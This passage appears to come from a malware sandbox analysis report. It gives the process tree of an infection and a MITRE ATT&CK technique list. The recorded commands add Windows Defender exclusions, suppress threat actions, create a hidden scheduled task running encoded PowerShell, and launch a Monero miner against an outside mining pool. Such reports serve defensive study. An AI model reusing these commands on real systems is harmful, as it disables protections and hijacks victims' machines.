/d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5160
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gBoaxfKEj" /SC once /ST 05:57:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gBoaxfKEj"
  2⤵
  PID:4540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\7zS330C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS330C.tmp\Install.exe it /sdZdidMVcr 385118 /S
1⤵
PID:5012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5636
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3624
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5180
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5668
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5188
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5964
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5708
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5764
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6052
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:660
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5332
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5996
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5620

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5400
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:960

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5668
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:5156
- - C:\Windows\Temp\306005.exe
    "C:\Windows\Temp\306005.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6048
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3160

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion